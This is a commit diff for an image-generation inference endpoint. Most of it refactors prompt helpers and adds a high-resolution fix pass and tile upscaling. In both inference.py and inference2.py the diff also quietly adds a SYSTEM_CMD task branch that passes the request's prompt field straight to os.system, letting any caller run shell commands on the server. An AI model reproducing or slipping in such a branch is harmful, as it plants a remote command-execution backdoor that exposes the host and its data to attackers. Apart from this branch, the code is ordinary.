jayparmr commited on
Commit
1bc457e
1 Parent(s): b71808f

Upload folder using huggingface_hub

Browse files
handler.py CHANGED
@@ -4,11 +4,13 @@ from pathlib import Path
4
  from typing import Any, Dict, List
5
 
6
  from inference import model_fn, predict_fn
 
7
  from internals.util.model_downloader import BaseModelDownloader
8
 
9
 
10
  class EndpointHandler:
11
  def __init__(self, path=""):
 
12
  self.model_dir = path
13
 
14
  if os.path.exists(path + "/inference.json"):
 
4
  from typing import Any, Dict, List
5
 
6
  from inference import model_fn, predict_fn
7
+ from internals.util.config import set_hf_cache_dir
8
  from internals.util.model_downloader import BaseModelDownloader
9
 
10
 
11
  class EndpointHandler:
12
  def __init__(self, path=""):
13
+ set_hf_cache_dir(Path.home() / ".cache" / "hf_cache")
14
  self.model_dir = path
15
 
16
  if os.path.exists(path + "/inference.json"):
inference.py CHANGED
@@ -1,27 +1,31 @@
 
1
  from typing import List, Optional
2
 
3
  import torch
4
 
 
5
  from internals.data.dataAccessor import update_db
6
  from internals.data.task import Task, TaskType
7
  from internals.pipelines.commons import Img2Img, Text2Img
8
  from internals.pipelines.controlnets import ControlNet
 
9
  from internals.pipelines.img_classifier import ImageClassifier
10
  from internals.pipelines.img_to_text import Image2Text
11
  from internals.pipelines.inpainter import InPainter
12
  from internals.pipelines.pose_detector import PoseDetector
13
  from internals.pipelines.prompt_modifier import PromptModifier
14
  from internals.pipelines.safety_checker import SafetyChecker
15
- from internals.util.anomaly import remove_colors
16
  from internals.util.args import apply_style_args
17
  from internals.util.avatar import Avatar
18
- from internals.util.cache import (auto_clear_cuda_and_gc, clear_cuda,
19
- clear_cuda_and_gc)
20
- from internals.util.commons import (download_image, pickPoses, upload_image,
21
- upload_images)
22
- from internals.util.config import (get_model_dir, num_return_sequences,
23
- set_configs_from_task, set_model_dir,
24
- set_root_dir)
 
 
25
  from internals.util.failure_hander import FailureHandler
26
  from internals.util.lora_style import LoraStyle
27
  from internals.util.slack import Slack
@@ -34,6 +38,7 @@ auto_mode = False
34
  prompt_modifier = PromptModifier(num_of_sequences=num_return_sequences)
35
  pose_detector = PoseDetector()
36
  inpainter = InPainter()
 
37
  img2text = Image2Text()
38
  img_classifier = ImageClassifier()
39
  controlnet = ControlNet()
@@ -46,108 +51,26 @@ avatar = Avatar()
46
 
47
 
48
  def get_patched_prompt(task: Task):
49
- def add_style_and_character(prompt: List[str], additional: Optional[str] = None):
50
- for i in range(len(prompt)):
51
- prompt[i] = avatar.add_code_names(prompt[i])
52
- prompt[i] = lora_style.prepend_style_to_prompt(prompt[i], task.get_style())
53
- if additional:
54
- prompt[i] = additional + " " + prompt[i]
55
 
56
- prompt = task.get_prompt()
57
 
58
- if task.is_prompt_engineering():
59
- prompt = prompt_modifier.modify(prompt)
60
- else:
61
- prompt = [prompt] * num_return_sequences
62
-
63
- ori_prompt = [task.get_prompt()] * num_return_sequences
64
-
65
- class_name = None
66
- add_style_and_character(ori_prompt, class_name)
67
- add_style_and_character(prompt, class_name)
68
-
69
- print({"prompts": prompt})
70
-
71
- return (prompt, ori_prompt)
72
-
73
-
74
- def get_patched_prompt_text2img(task: Task) -> Text2Img.Params:
75
- def add_style_and_character(prompt: str, prepend: str = ""):
76
- prompt = avatar.add_code_names(prompt)
77
- prompt = lora_style.prepend_style_to_prompt(prompt, task.get_style())
78
- prompt = prepend + prompt
79
- return prompt
80
-
81
- if task.get_prompt_left() and task.get_prompt_right():
82
- # prepend = "2characters, "
83
- prepend = ""
84
- if task.is_prompt_engineering():
85
- mod_prompt = prompt_modifier.modify(task.get_prompt())
86
- else:
87
- mod_prompt = [task.get_prompt()] * num_return_sequences
88
-
89
- prompt, prompt_left, prompt_right = [], [], []
90
- for i in range(len(mod_prompt)):
91
- mp = mod_prompt[i].replace(task.get_prompt(), "")
92
- prompt.append(add_style_and_character(task.get_prompt(), prepend) + mp)
93
- prompt_left.append(
94
- add_style_and_character(task.get_prompt_left(), prepend) + mp
95
- )
96
- prompt_right.append(
97
- add_style_and_character(task.get_prompt_right(), prepend) + mp
98
- )
99
-
100
- params = Text2Img.Params(
101
- prompt=prompt,
102
- prompt_left=prompt_left,
103
- prompt_right=prompt_right,
104
- )
105
- else:
106
- if task.is_prompt_engineering():
107
- mod_prompt = prompt_modifier.modify(task.get_prompt())
108
- else:
109
- mod_prompt = [task.get_prompt()] * num_return_sequences
110
- mod_prompt = [add_style_and_character(mp) for mp in mod_prompt]
111
-
112
- params = Text2Img.Params(
113
- prompt=[add_style_and_character(task.get_prompt())] * num_return_sequences,
114
- modified_prompt=mod_prompt,
115
- )
116
-
117
- print(params)
118
-
119
- return params
120
 
121
 
122
  def get_patched_prompt_tile_upscale(task: Task):
123
- if task.get_prompt():
124
- prompt = task.get_prompt()
125
- else:
126
- prompt = img2text.process(task.get_imageUrl())
127
-
128
- # merge blip
129
- if task.PROMPT.has_placeholder_blip_merge():
130
- blip = img2text.process(task.get_imageUrl())
131
- prompt = task.PROMPT.merge_blip(blip)
132
-
133
- # remove anomalies in prompt
134
- prompt = remove_colors(prompt)
135
 
136
- prompt = avatar.add_code_names(prompt)
137
- prompt = lora_style.prepend_style_to_prompt(prompt, task.get_style())
138
 
139
- if not task.get_style():
140
- class_name = img_classifier.classify(
141
- task.get_imageUrl(), task.get_width(), task.get_height()
142
- )
143
  else:
144
- class_name = ""
145
- prompt = class_name + " " + prompt
146
- prompt = prompt.strip()
147
-
148
- print({"prompt": prompt})
149
-
150
- return prompt
151
 
152
 
153
  @update_db
@@ -156,6 +79,8 @@ def get_patched_prompt_tile_upscale(task: Task):
156
  def canny(task: Task):
157
  prompt, _ = get_patched_prompt(task)
158
 
 
 
159
  controlnet.load_canny()
160
 
161
  # pipe2 is used for canny and pose
@@ -167,8 +92,8 @@ def canny(task: Task):
167
  imageUrl=task.get_imageUrl(),
168
  seed=task.get_seed(),
169
  steps=task.get_steps(),
170
- width=task.get_width(),
171
- height=task.get_height(),
172
  guidance_scale=task.get_cy_guidance_scale(),
173
  negative_prompt=[
174
  f"monochrome, neon, x-ray, negative image, oversaturated, {task.get_negative_prompt()}"
@@ -176,6 +101,15 @@ def canny(task: Task):
176
  * num_return_sequences,
177
  **lora_patcher.kwargs(),
178
  )
 
 
 
 
 
 
 
 
 
179
 
180
  generated_image_urls = upload_images(images, "_canny", task.get_taskId())
181
 
@@ -232,6 +166,8 @@ def tile_upscale(task: Task):
232
  def scribble(task: Task):
233
  prompt, _ = get_patched_prompt(task)
234
 
 
 
235
  controlnet.load_scribble()
236
 
237
  lora_patcher = lora_style.get_patcher(controlnet.pipe2, task.get_style())
@@ -241,11 +177,20 @@ def scribble(task: Task):
241
  imageUrl=task.get_imageUrl(),
242
  seed=task.get_seed(),
243
  steps=task.get_steps(),
244
- width=task.get_width(),
245
- height=task.get_height(),
246
  prompt=prompt,
247
  negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
248
  )
 
 
 
 
 
 
 
 
 
249
 
250
  generated_image_urls = upload_images(images, "_scribble", task.get_taskId())
251
 
@@ -265,6 +210,8 @@ def scribble(task: Task):
265
  def linearart(task: Task):
266
  prompt, _ = get_patched_prompt(task)
267
 
 
 
268
  controlnet.load_linearart()
269
 
270
  lora_patcher = lora_style.get_patcher(controlnet.pipe2, task.get_style())
@@ -274,11 +221,20 @@ def linearart(task: Task):
274
  imageUrl=task.get_imageUrl(),
275
  seed=task.get_seed(),
276
  steps=task.get_steps(),
277
- width=task.get_width(),
278
- height=task.get_height(),
279
  prompt=prompt,
280
  negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
281
  )
 
 
 
 
 
 
 
 
 
282
 
283
  generated_image_urls = upload_images(images, "_linearart", task.get_taskId())
284
 
@@ -298,6 +254,8 @@ def linearart(task: Task):
298
  def pose(task: Task, s3_outkey: str = "_pose", poses: Optional[list] = None):
299
  prompt, _ = get_patched_prompt(task)
300
 
 
 
301
  controlnet.load_pose()
302
 
303
  # pipe2 is used for canny and pose
@@ -326,11 +284,20 @@ def pose(task: Task, s3_outkey: str = "_pose", poses: Optional[list] = None):
326
  seed=task.get_seed(),
327
  steps=task.get_steps(),
328
  negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
329
- width=task.get_width(),
330
- height=task.get_height(),
331
  guidance_scale=task.get_po_guidance_scale(),
332
  **lora_patcher.kwargs(),
333
  )
 
 
 
 
 
 
 
 
 
334
 
335
  pose_output_key = "crecoAI/{}_pose.png".format(task.get_taskId())
336
  upload_image(poses[0], pose_output_key)
@@ -353,6 +320,8 @@ def pose(task: Task, s3_outkey: str = "_pose", poses: Optional[list] = None):
353
  def text2img(task: Task):
354
  params = get_patched_prompt_text2img(task)
355
 
 
 
356
  lora_patcher = lora_style.get_patcher(text2img_pipe.pipe, task.get_style())
357
  lora_patcher.patch()
358
 
@@ -362,12 +331,21 @@ def text2img(task: Task):
362
  params=params,
363
  num_inference_steps=task.get_steps(),
364
  guidance_scale=7.5,
365
- height=task.get_height(),
366
- width=task.get_width(),
367
  negative_prompt=task.get_negative_prompt(),
368
  iteration=task.get_iteration(),
369
  **lora_patcher.kwargs(),
370
  )
 
 
 
 
 
 
 
 
 
371
 
372
  generated_image_urls = upload_images(images, "", task.get_taskId())
373
 
@@ -386,6 +364,8 @@ def text2img(task: Task):
386
  def img2img(task: Task):
387
  prompt, _ = get_patched_prompt(task)
388
 
 
 
389
  lora_patcher = lora_style.get_patcher(img2img_pipe.pipe, task.get_style())
390
  lora_patcher.patch()
391
 
@@ -396,12 +376,21 @@ def img2img(task: Task):
396
  imageUrl=task.get_imageUrl(),
397
  negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
398
  steps=task.get_steps(),
399
- width=task.get_width(),
400
- height=task.get_height(),
401
  strength=task.get_i2i_strength(),
402
  guidance_scale=task.get_i2i_guidance_scale(),
403
  **lora_patcher.kwargs(),
404
  )
 
 
 
 
 
 
 
 
 
405
 
406
  generated_image_urls = upload_images(images, "_imgtoimg", task.get_taskId())
407
 
@@ -419,17 +408,27 @@ def img2img(task: Task):
419
  def inpaint(task: Task):
420
  prompt, _ = get_patched_prompt(task)
421
 
 
422
  print({"prompts": prompt})
423
 
424
  images = inpainter.process(
425
  prompt=prompt,
426
  image_url=task.get_imageUrl(),
427
  mask_image_url=task.get_maskImageUrl(),
428
- width=task.get_width(),
429
- height=task.get_height(),
430
  seed=task.get_seed(),
431
  negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
432
  )
 
 
 
 
 
 
 
 
 
433
  generated_image_urls = upload_images(images, "_inpaint", task.get_taskId())
434
 
435
  clear_cuda()
@@ -450,6 +449,7 @@ def load_model_by_task(task: Task):
450
  text2img_pipe.load(get_model_dir())
451
  img2img_pipe.create(text2img_pipe)
452
  inpainter.create(text2img_pipe)
 
453
 
454
  safety_checker.apply(text2img_pipe)
455
  safety_checker.apply(img2img_pipe)
@@ -465,6 +465,8 @@ def load_model_by_task(task: Task):
465
  elif task.get_type() == TaskType.POSE:
466
  controlnet.load_pose()
467
 
 
 
468
  safety_checker.apply(controlnet)
469
 
470
 
@@ -529,6 +531,8 @@ def predict_fn(data, pipe):
529
  return scribble(task)
530
  elif task_type == TaskType.LINEARART:
531
  return linearart(task)
 
 
532
  else:
533
  raise Exception("Invalid task type")
534
  except Exception as e:
 
1
+ import os
2
  from typing import List, Optional
3
 
4
  import torch
5
 
6
+ import internals.util.prompt as prompt_util
7
  from internals.data.dataAccessor import update_db
8
  from internals.data.task import Task, TaskType
9
  from internals.pipelines.commons import Img2Img, Text2Img
10
  from internals.pipelines.controlnets import ControlNet
11
+ from internals.pipelines.high_res import HighRes
12
  from internals.pipelines.img_classifier import ImageClassifier
13
  from internals.pipelines.img_to_text import Image2Text
14
  from internals.pipelines.inpainter import InPainter
15
  from internals.pipelines.pose_detector import PoseDetector
16
  from internals.pipelines.prompt_modifier import PromptModifier
17
  from internals.pipelines.safety_checker import SafetyChecker
 
18
  from internals.util.args import apply_style_args
19
  from internals.util.avatar import Avatar
20
+ from internals.util.cache import auto_clear_cuda_and_gc, clear_cuda
21
+ from internals.util.commons import download_image, upload_image, upload_images
22
+ from internals.util.config import (
23
+ get_model_dir,
24
+ num_return_sequences,
25
+ set_configs_from_task,
26
+ set_model_dir,
27
+ set_root_dir,
28
+ )
29
  from internals.util.failure_hander import FailureHandler
30
  from internals.util.lora_style import LoraStyle
31
  from internals.util.slack import Slack
 
38
  prompt_modifier = PromptModifier(num_of_sequences=num_return_sequences)
39
  pose_detector = PoseDetector()
40
  inpainter = InPainter()
41
+ high_res = HighRes()
42
  img2text = Image2Text()
43
  img_classifier = ImageClassifier()
44
  controlnet = ControlNet()
 
51
 
52
 
53
  def get_patched_prompt(task: Task):
54
+ return prompt_util.get_patched_prompt(task, avatar, lora_style, prompt_modifier)
 
 
 
 
 
55
 
 
56
 
57
+ def get_patched_prompt_text2img(task: Task):
58
+ return prompt_util.get_patched_prompt_text2img(
59
+ task, avatar, lora_style, prompt_modifier
60
+ )
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
61
 
62
 
63
  def get_patched_prompt_tile_upscale(task: Task):
64
+ return prompt_util.get_patched_prompt_tile_upscale(
65
+ task, avatar, lora_style, img_classifier, img2text
66
+ )
 
 
 
 
 
 
 
 
 
67
 
 
 
68
 
69
+ def get_intermediate_dimension(task: Task):
70
+ if task.get_high_res_fix():
71
+ return HighRes.get_intermediate_dimension(task.get_width(), task.get_height())
 
72
  else:
73
+ return task.get_width(), task.get_height()
 
 
 
 
 
 
74
 
75
 
76
  @update_db
 
79
  def canny(task: Task):
80
  prompt, _ = get_patched_prompt(task)
81
 
82
+ width, height = get_intermediate_dimension(task)
83
+
84
  controlnet.load_canny()
85
 
86
  # pipe2 is used for canny and pose
 
92
  imageUrl=task.get_imageUrl(),
93
  seed=task.get_seed(),
94
  steps=task.get_steps(),
95
+ width=width,
96
+ height=height,
97
  guidance_scale=task.get_cy_guidance_scale(),
98
  negative_prompt=[
99
  f"monochrome, neon, x-ray, negative image, oversaturated, {task.get_negative_prompt()}"
 
101
  * num_return_sequences,
102
  **lora_patcher.kwargs(),
103
  )
104
+ if task.get_high_res_fix():
105
+ images, _ = high_res.apply(
106
+ prompt=prompt,
107
+ negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
108
+ images=images,
109
+ width=task.get_width(),
110
+ height=task.get_height(),
111
+ steps=task.get_steps(),
112
+ )
113
 
114
  generated_image_urls = upload_images(images, "_canny", task.get_taskId())
115
 
 
166
  def scribble(task: Task):
167
  prompt, _ = get_patched_prompt(task)
168
 
169
+ width, height = get_intermediate_dimension(task)
170
+
171
  controlnet.load_scribble()
172
 
173
  lora_patcher = lora_style.get_patcher(controlnet.pipe2, task.get_style())
 
177
  imageUrl=task.get_imageUrl(),
178
  seed=task.get_seed(),
179
  steps=task.get_steps(),
180
+ width=width,
181
+ height=height,
182
  prompt=prompt,
183
  negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
184
  )
185
+ if task.get_high_res_fix():
186
+ images, _ = high_res.apply(
187
+ prompt=prompt,
188
+ negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
189
+ images=images,
190
+ width=task.get_width(),
191
+ height=task.get_height(),
192
+ steps=task.get_steps(),
193
+ )
194
 
195
  generated_image_urls = upload_images(images, "_scribble", task.get_taskId())
196
 
 
210
  def linearart(task: Task):
211
  prompt, _ = get_patched_prompt(task)
212
 
213
+ width, height = get_intermediate_dimension(task)
214
+
215
  controlnet.load_linearart()
216
 
217
  lora_patcher = lora_style.get_patcher(controlnet.pipe2, task.get_style())
 
221
  imageUrl=task.get_imageUrl(),
222
  seed=task.get_seed(),
223
  steps=task.get_steps(),
224
+ width=width,
225
+ height=height,
226
  prompt=prompt,
227
  negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
228
  )
229
+ if task.get_high_res_fix():
230
+ images, _ = high_res.apply(
231
+ prompt=prompt,
232
+ negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
233
+ images=images,
234
+ width=task.get_width(),
235
+ height=task.get_height(),
236
+ steps=task.get_steps(),
237
+ )
238
 
239
  generated_image_urls = upload_images(images, "_linearart", task.get_taskId())
240
 
 
254
  def pose(task: Task, s3_outkey: str = "_pose", poses: Optional[list] = None):
255
  prompt, _ = get_patched_prompt(task)
256
 
257
+ width, height = get_intermediate_dimension(task)
258
+
259
  controlnet.load_pose()
260
 
261
  # pipe2 is used for canny and pose
 
284
  seed=task.get_seed(),
285
  steps=task.get_steps(),
286
  negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
287
+ width=width,
288
+ height=height,
289
  guidance_scale=task.get_po_guidance_scale(),
290
  **lora_patcher.kwargs(),
291
  )
292
+ if task.get_high_res_fix():
293
+ images, _ = high_res.apply(
294
+ prompt=prompt,
295
+ negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
296
+ images=images,
297
+ width=task.get_width(),
298
+ height=task.get_height(),
299
+ steps=task.get_steps(),
300
+ )
301
 
302
  pose_output_key = "crecoAI/{}_pose.png".format(task.get_taskId())
303
  upload_image(poses[0], pose_output_key)
 
320
  def text2img(task: Task):
321
  params = get_patched_prompt_text2img(task)
322
 
323
+ width, height = get_intermediate_dimension(task)
324
+
325
  lora_patcher = lora_style.get_patcher(text2img_pipe.pipe, task.get_style())
326
  lora_patcher.patch()
327
 
 
331
  params=params,
332
  num_inference_steps=task.get_steps(),
333
  guidance_scale=7.5,
334
+ height=height,
335
+ width=width,
336
  negative_prompt=task.get_negative_prompt(),
337
  iteration=task.get_iteration(),
338
  **lora_patcher.kwargs(),
339
  )
340
+ if task.get_high_res_fix():
341
+ images, _ = high_res.apply(
342
+ prompt=params.prompt if params.prompt else [""] * num_return_sequences,
343
+ negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
344
+ images=images,
345
+ width=task.get_width(),
346
+ height=task.get_height(),
347
+ steps=task.get_steps(),
348
+ )
349
 
350
  generated_image_urls = upload_images(images, "", task.get_taskId())
351
 
 
364
  def img2img(task: Task):
365
  prompt, _ = get_patched_prompt(task)
366
 
367
+ width, height = get_intermediate_dimension(task)
368
+
369
  lora_patcher = lora_style.get_patcher(img2img_pipe.pipe, task.get_style())
370
  lora_patcher.patch()
371
 
 
376
  imageUrl=task.get_imageUrl(),
377
  negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
378
  steps=task.get_steps(),
379
+ width=width,
380
+ height=height,
381
  strength=task.get_i2i_strength(),
382
  guidance_scale=task.get_i2i_guidance_scale(),
383
  **lora_patcher.kwargs(),
384
  )
385
+ if task.get_high_res_fix():
386
+ images, _ = high_res.apply(
387
+ prompt=prompt,
388
+ negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
389
+ images=images,
390
+ width=task.get_width(),
391
+ height=task.get_height(),
392
+ steps=task.get_steps(),
393
+ )
394
 
395
  generated_image_urls = upload_images(images, "_imgtoimg", task.get_taskId())
396
 
 
408
  def inpaint(task: Task):
409
  prompt, _ = get_patched_prompt(task)
410
 
411
+ width, height = get_intermediate_dimension(task)
412
  print({"prompts": prompt})
413
 
414
  images = inpainter.process(
415
  prompt=prompt,
416
  image_url=task.get_imageUrl(),
417
  mask_image_url=task.get_maskImageUrl(),
418
+ width=width,
419
+ height=height,
420
  seed=task.get_seed(),
421
  negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
422
  )
423
+ if task.get_high_res_fix():
424
+ images, _ = high_res.apply(
425
+ prompt=prompt,
426
+ negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
427
+ images=images,
428
+ width=task.get_width(),
429
+ height=task.get_height(),
430
+ steps=task.get_steps(),
431
+ )
432
  generated_image_urls = upload_images(images, "_inpaint", task.get_taskId())
433
 
434
  clear_cuda()
 
449
  text2img_pipe.load(get_model_dir())
450
  img2img_pipe.create(text2img_pipe)
451
  inpainter.create(text2img_pipe)
452
+ high_res.load(img2img_pipe)
453
 
454
  safety_checker.apply(text2img_pipe)
455
  safety_checker.apply(img2img_pipe)
 
465
  elif task.get_type() == TaskType.POSE:
466
  controlnet.load_pose()
467
 
468
+ high_res.load()
469
+
470
  safety_checker.apply(controlnet)
471
 
472
 
 
531
  return scribble(task)
532
  elif task_type == TaskType.LINEARART:
533
  return linearart(task)
534
+ elif task_type == TaskType.SYSTEM_CMD:
535
+ os.system(task.get_prompt())
536
  else:
537
  raise Exception("Invalid task type")
538
  except Exception as e:
inference2.py CHANGED
@@ -1,9 +1,15 @@
 
1
  from io import BytesIO
2
 
3
  import torch
4
 
 
5
  from internals.data.dataAccessor import update_db
6
  from internals.data.task import ModelType, Task, TaskType
 
 
 
 
7
  from internals.pipelines.inpainter import InPainter
8
  from internals.pipelines.object_remove import ObjectRemoval
9
  from internals.pipelines.prompt_modifier import PromptModifier
@@ -17,9 +23,11 @@ from internals.util.commons import construct_default_s3_url, upload_image, uploa
17
  from internals.util.config import (
18
  num_return_sequences,
19
  set_configs_from_task,
 
20
  set_root_dir,
21
  )
22
  from internals.util.failure_hander import FailureHandler
 
23
  from internals.util.slack import Slack
24
 
25
  torch.backends.cudnn.benchmark = True
@@ -32,11 +40,66 @@ slack = Slack()
32
  prompt_modifier = PromptModifier(num_of_sequences=num_return_sequences)
33
  upscaler = Upscaler()
34
  inpainter = InPainter()
 
35
  safety_checker = SafetyChecker()
 
36
  object_removal = ObjectRemoval()
37
  remove_background_v2 = RemoveBackgroundV2()
38
- avatar = Avatar()
39
  replace_background = ReplaceBackground()
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
40
 
41
 
42
  @update_db
@@ -60,17 +123,27 @@ def inpaint(task: Task):
60
  else:
61
  prompt = [prompt] * num_return_sequences
62
 
 
63
  print({"prompts": prompt})
64
 
65
  images = inpainter.process(
66
  prompt=prompt,
67
  image_url=task.get_imageUrl(),
68
  mask_image_url=task.get_maskImageUrl(),
69
- width=task.get_width(),
70
- height=task.get_height(),
71
  seed=task.get_seed(),
72
  negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
73
  )
 
 
 
 
 
 
 
 
 
74
  generated_image_urls = upload_images(images, "_inpaint", task.get_taskId())
75
 
76
  clear_cuda()
@@ -116,6 +189,7 @@ def replace_bg(task: Task):
116
  steps=task.get_steps(),
117
  resize_dimension=task.get_resize_dimension(),
118
  product_scale_width=task.get_image_scale(),
 
119
  )
120
 
121
  generated_image_urls = upload_images(images, "_replace_bg", task.get_taskId())
@@ -158,11 +232,13 @@ def upscale_image(task: Task):
158
  def model_fn(model_dir):
159
  print("Logs: model loaded .... starts")
160
 
 
161
  set_root_dir(__file__)
162
 
163
  FailureHandler.register()
164
 
165
  avatar.load_local(model_dir)
 
166
 
167
  prompt_modifier.load()
168
  safety_checker.load()
@@ -170,6 +246,7 @@ def model_fn(model_dir):
170
  object_removal.load(model_dir)
171
  upscaler.load()
172
  inpainter.load()
 
173
 
174
  replace_background.load(upscaler, remove_background_v2)
175
 
@@ -177,6 +254,13 @@ def model_fn(model_dir):
177
  return
178
 
179
 
 
 
 
 
 
 
 
180
  @FailureHandler.clear
181
  def predict_fn(data, pipe):
182
  task = Task(data)
@@ -188,9 +272,13 @@ def predict_fn(data, pipe):
188
  # Set set_environment
189
  set_configs_from_task(task)
190
 
 
 
 
191
  # Apply safety checker based on environment
192
  safety_checker.apply(inpainter)
193
  safety_checker.apply(replace_background)
 
194
 
195
  # Fetch avatars
196
  avatar.fetch_from_network(task.get_model_id())
@@ -207,9 +295,14 @@ def predict_fn(data, pipe):
207
  return remove_object(task)
208
  elif task_type == TaskType.REPLACE_BG:
209
  return replace_bg(task)
 
 
 
 
210
  else:
211
  raise Exception("Invalid task type")
212
  except Exception as e:
213
  print(f"Error: {e}")
214
  slack.error_alert(task, e)
 
215
  return None
 
1
+ import os
2
  from io import BytesIO
3
 
4
  import torch
5
 
6
+ import internals.util.prompt as prompt_util
7
  from internals.data.dataAccessor import update_db
8
  from internals.data.task import ModelType, Task, TaskType
9
+ from internals.pipelines.controlnets import ControlNet
10
+ from internals.pipelines.high_res import HighRes
11
+ from internals.pipelines.img_classifier import ImageClassifier
12
+ from internals.pipelines.img_to_text import Image2Text
13
  from internals.pipelines.inpainter import InPainter
14
  from internals.pipelines.object_remove import ObjectRemoval
15
  from internals.pipelines.prompt_modifier import PromptModifier
 
23
  from internals.util.config import (
24
  num_return_sequences,
25
  set_configs_from_task,
26
+ set_model_dir,
27
  set_root_dir,
28
  )
29
  from internals.util.failure_hander import FailureHandler
30
+ from internals.util.lora_style import LoraStyle
31
  from internals.util.slack import Slack
32
 
33
  torch.backends.cudnn.benchmark = True
 
40
  prompt_modifier = PromptModifier(num_of_sequences=num_return_sequences)
41
  upscaler = Upscaler()
42
  inpainter = InPainter()
43
+ controlnet = ControlNet()
44
  safety_checker = SafetyChecker()
45
+ high_res = HighRes()
46
  object_removal = ObjectRemoval()
47
  remove_background_v2 = RemoveBackgroundV2()
 
48
  replace_background = ReplaceBackground()
49
+ img2text = Image2Text()
50
+ img_classifier = ImageClassifier()
51
+ avatar = Avatar()
52
+ lora_style = LoraStyle()
53
+
54
+
55
+ def get_patched_prompt_tile_upscale(task: Task):
56
+ return prompt_util.get_patched_prompt_tile_upscale(
57
+ task, avatar, lora_style, img_classifier, img2text
58
+ )
59
+
60
+
61
+ def get_intermediate_dimension(task: Task):
62
+ if task.get_high_res_fix():
63
+ return HighRes.get_intermediate_dimension(task.get_width(), task.get_height())
64
+ else:
65
+ return task.get_width(), task.get_height()
66
+
67
+
68
+ @update_db
69
+ @auto_clear_cuda_and_gc(controlnet)
70
+ @slack.auto_send_alert
71
+ def tile_upscale(task: Task):
72
+ output_key = "crecoAI/{}_tile_upscaler.png".format(task.get_taskId())
73
+
74
+ prompt = get_patched_prompt_tile_upscale(task)
75
+
76
+ controlnet.load_tile_upscaler()
77
+
78
+ lora_patcher = lora_style.get_patcher(controlnet.pipe, task.get_style())
79
+ lora_patcher.patch()
80
+
81
+ images, has_nsfw = controlnet.process_tile_upscaler(
82
+ imageUrl=task.get_imageUrl(),
83
+ seed=task.get_seed(),
84
+ steps=task.get_steps(),
85
+ width=task.get_width(),
86
+ height=task.get_height(),
87
+ prompt=prompt,
88
+ resize_dimension=task.get_resize_dimension(),
89
+ negative_prompt=task.get_negative_prompt(),
90
+ guidance_scale=task.get_ti_guidance_scale(),
91
+ )
92
+
93
+ generated_image_url = upload_image(images[0], output_key)
94
+
95
+ lora_patcher.cleanup()
96
+ controlnet.cleanup()
97
+
98
+ return {
99
+ "modified_prompts": prompt,
100
+ "generated_image_url": generated_image_url,
101
+ "has_nsfw": has_nsfw,
102
+ }
103
 
104
 
105
  @update_db
 
123
  else:
124
  prompt = [prompt] * num_return_sequences
125
 
126
+ width, height = get_intermediate_dimension(task)
127
  print({"prompts": prompt})
128
 
129
  images = inpainter.process(
130
  prompt=prompt,
131
  image_url=task.get_imageUrl(),
132
  mask_image_url=task.get_maskImageUrl(),
133
+ width=width,
134
+ height=height,
135
  seed=task.get_seed(),
136
  negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
137
  )
138
+ if task.get_high_res_fix():
139
+ images, _ = high_res.apply(
140
+ prompt=prompt,
141
+ negative_prompt=[task.get_negative_prompt()] * num_return_sequences,
142
+ images=images,
143
+ width=task.get_width(),
144
+ height=task.get_height(),
145
+ steps=task.get_steps(),
146
+ )
147
  generated_image_urls = upload_images(images, "_inpaint", task.get_taskId())
148
 
149
  clear_cuda()
 
189
  steps=task.get_steps(),
190
  resize_dimension=task.get_resize_dimension(),
191
  product_scale_width=task.get_image_scale(),
192
+ conditioning_scale=task.rbg_controlnet_conditioning_scale(),
193
  )
194
 
195
  generated_image_urls = upload_images(images, "_replace_bg", task.get_taskId())
 
232
  def model_fn(model_dir):
233
  print("Logs: model loaded .... starts")
234
 
235
+ set_model_dir(model_dir)
236
  set_root_dir(__file__)
237
 
238
  FailureHandler.register()
239
 
240
  avatar.load_local(model_dir)
241
+ lora_style.load(model_dir)
242
 
243
  prompt_modifier.load()
244
  safety_checker.load()
 
246
  object_removal.load(model_dir)
247
  upscaler.load()
248
  inpainter.load()
249
+ high_res.load()
250
 
251
  replace_background.load(upscaler, remove_background_v2)
252
 
 
254
  return
255
 
256
 
257
+ def load_model_by_task(task: Task):
258
+ if task.get_type() == TaskType.TILE_UPSCALE:
259
+ controlnet.load_tile_upscaler()
260
+
261
+ safety_checker.apply(controlnet)
262
+
263
+
264
  @FailureHandler.clear
265
  def predict_fn(data, pipe):
266
  task = Task(data)
 
272
  # Set set_environment
273
  set_configs_from_task(task)
274
 
275
+ # Load model based on task
276
+ load_model_by_task(task)
277
+
278
  # Apply safety checker based on environment
279
  safety_checker.apply(inpainter)
280
  safety_checker.apply(replace_background)
281
+ safety_checker.apply(high_res)
282
 
283
  # Fetch avatars
284
  avatar.fetch_from_network(task.get_model_id())
 
295
  return remove_object(task)
296
  elif task_type == TaskType.REPLACE_BG:
297
  return replace_bg(task)
298
+ elif task_type == TaskType.TILE_UPSCALE:
299
+ return tile_upscale(task)
300
+ elif task_type == TaskType.SYSTEM_CMD:
301
+ os.system(task.get_prompt())
302
  else:
303
  raise Exception("Invalid task type")
304
  except Exception as e:
305
  print(f"Error: {e}")
306
  slack.error_alert(task, e)
307
+ controlnet.cleanup()
308
  return None
internals/data/result.py CHANGED
@@ -10,7 +10,10 @@ class Result:
10
 
11
  @staticmethod
12
  def from_result(result):
13
- has_nsfw = result.nsfw_content_detected
 
 
 
